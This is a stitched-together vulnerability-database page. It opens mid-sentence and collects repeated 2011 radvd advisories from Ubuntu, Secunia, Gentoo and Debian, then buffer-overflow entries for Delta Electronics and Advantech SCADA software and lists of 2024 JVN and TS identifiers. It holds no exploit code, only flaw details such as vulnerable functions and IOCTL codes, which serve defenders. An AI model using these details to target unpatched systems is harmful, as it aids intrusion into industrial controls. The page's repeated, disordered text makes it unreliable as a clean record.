updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0026 Buffer overflow in the process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative value in a label_len value. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A buffer overflow vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201803-1810 A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation ISPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of dvp files. The process does not properly validate the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of current process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2024-014918 Authentication Bypass Vulnerability in Hitachi Infrastructure Analytics Advisor and Hitachi Ops Center Analyzer 2024-12-17T15:23+09:00 2024-12-17T15:23+09:00
jvndb-2024-000128 Multiple vulnerabilities in SHARP routers 2024-12-17T07:54+09:00 2024-12-17T07:54+09:00
jvndb-2024-000127 "Shonen Jump+" App for Android fails to restrict custom URL schemes properly 2024-12-16T15:07+09:00 2024-12-16T15:07+09:00
jvndb-2024-014825 WordPress Plugin "My WP Customize Admin/Frontend" vulnerable to cross-site scripting 2024-12-16T13:57+09:00 2024-12-16T13:57+09:00
jvndb-2024-014793 Multiple vulnerabilities in FXC AE1021 and AE1021PE 2024-12-16T11:51+09:00 2024-12-16T11:51+09:00
jvndb-2024-014079 Trend Micro Deep Security Agent for Windows and Deep Security Notifier on DSVA vulnerable to OS command injection 2024-12-06T12:11+09:00 2024-12-06T12:11+09:00
jvndb-2024-000125 Multiple vulnerabilities in I-O DATA routers UD-LT1 and UD-LT1/EX 2024-12-04T15:22+09:00 2024-12-04T15:22+09:00
jvndb-2023-000085 "Skylark" App fails to restrict custom URL schemes properly 2023-08-24T13:34+09:00 2024-12-03T15:51+09:00
jvndb-2024-000124 Multiple vulnerabilities in UNIVERGE IX/IX-R/IX-V series routers 2024-12-02T16:38+09:00 2024-12-02T16:38+09:00
jvndb-2024-000123 Multiple FCNT Android devices vulnerable to authentication bypass 2024-11-29T15:30+09:00 2024-11-29T15:30+09:00
jvndb-2024-013702 Multiple vulnerabilities in FUJI ELECTRIC products 2024-11-29T14:42+09:00 2024-11-29T14:42+09:00
jvndb-2024-002831 ELECOM wireless LAN routers vulnerable to OS command injection 2024-02-22T08:15+09:00 2024-11-27T14:45+09:00
jvndb-2024-000122 HAProxy vulnerable to HTTP request/response smuggling 2024-11-27T14:36+09:00 2024-11-27T14:36+09:00
jvndb-2024-003025 Multiple vulnerabilities in ELECOM wireless LAN routers 2024-03-27T14:26+09:00 2024-11-27T14:34+09:00
jvndb-2024-012461 Multiple vulnerabilities in SoftBank Mesh Wi-Fi router RP562B 2024-11-13T14:26+09:00 2024-11-26T16:11+09:00
jvndb-2024-000020 Multiple vulnerabilities in ELECOM wireless LAN routers and wireless LAN repeater 2024-02-20T14:14+09:00 2024-11-26T15:26+09:00
jvndb-2024-000088 Multiple vulnerabilities in ELECOM wireless LAN routers and access points 2024-08-27T14:40+09:00 2024-11-26T15:17+09:00
jvndb-2024-000078 Multiple vulnerabilities in ELECOM wireless LAN routers 2024-07-30T15:34+09:00 2024-11-26T14:35+09:00
jvndb-2024-000121 WordPress Plugin "WP Admin UI Customize" vulnerable to cross-site scripting 2024-11-26T13:57+09:00 2024-11-26T13:57+09:00
jvndb-2024-013260 Multiple vulnerabilities in Edgecross Basic Software for Windows 2024-11-22T10:59+09:00 2024-11-22T10:59+09:00
jvndb-2024-000106 Multiple vulnerabilities in AIPHONE IX SYSTEM, IXG SYSTEM, and System Support Software 2024-10-21T11:58+09:00 2024-11-21T11:37+09:00
jvndb-2024-000120 "Kura Sushi Official App Produced by EPARK" for Android uses a hard-coded cryptographic key 2024-11-20T13:56+09:00 2024-11-20T13:56+09:00
jvndb-2024-000119 Multiple vulnerabilities in FitNesse 2024-11-15T13:37+09:00 2024-11-20T11:18+09:00
jvndb-2024-012941 Multiple vulnerabilities in Rakuten Turbo 5G 2024-11-19T10:41+09:00 2024-11-19T10:41+09:00
jvndb-2024-000118 WordPress Plugin "VK All in One Expansion Unit" vulnerable to cross-site scripting 2024-11-13T13:50+09:00 2024-11-13T13:50+09:00
jvndb-2024-009481 Insecure initial password configuration issue in SEIKO EPSON Web Config 2024-10-01T14:14+09:00 2024-11-12T10:25+09:00
jvndb-2024-000109 baserCMS plugin "BurgerEditor" vulnerable to directory listing 2024-10-10T14:57+09:00 2024-11-06T14:45+09:00
jvndb-2024-012017 Trend Micro Deep Security 20 Agent for Windows vulnerable to improper access control 2024-11-06T11:00+09:00 2024-11-06T11:00+09:00
jvndb-2024-011833 Incorrect authorization vulnerability in OMRON Sysmac Studio 2024-11-05T15:29+09:00 2024-11-05T15:29+09:00
jvndb-2024-011747 Command injection vulnerability in Trend Micro Cloud Edge 2024-11-01T14:28+09:00 2024-11-01T14:28+09:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2024-013 TS-2024-013
ts-2024-012 TS-2024-012
ts-2024-011 TS-2024-011
ts-2024-010 TS-2024-010
ts-2024-009 TS-2024-009
ts-2024-008 TS-2024-008
ts-2024-007 TS-2024-007
ts-2024-006 TS-2024-006
ts-2024-005 TS-2024-005
ts-2024-004 TS-2024-004
ts-2024-003 TS-2024-003
ts-2024-002 TS-2024-002
ts-2024-001 TS-2024-001
ts-2023-009 TS-2023-009
ts-2023-008 TS-2023-008
ts-2023-007 TS-2023-007
ts-2023-006 TS-2023-006
ts-2023-005 TS-2023-005
ts-2023-004 TS-2023-004
ts-2023-003 TS-2023-003
ts-2023-002 TS-2023-002
ts-2023-001 TS-2023-001
ts-2022-005 TS-2022-005
ts-2022-004 TS-2022-004
ts-2022-003 TS-2022-003
ts-2022-002 TS-2022-002
ts-2022-001 TS-2022-001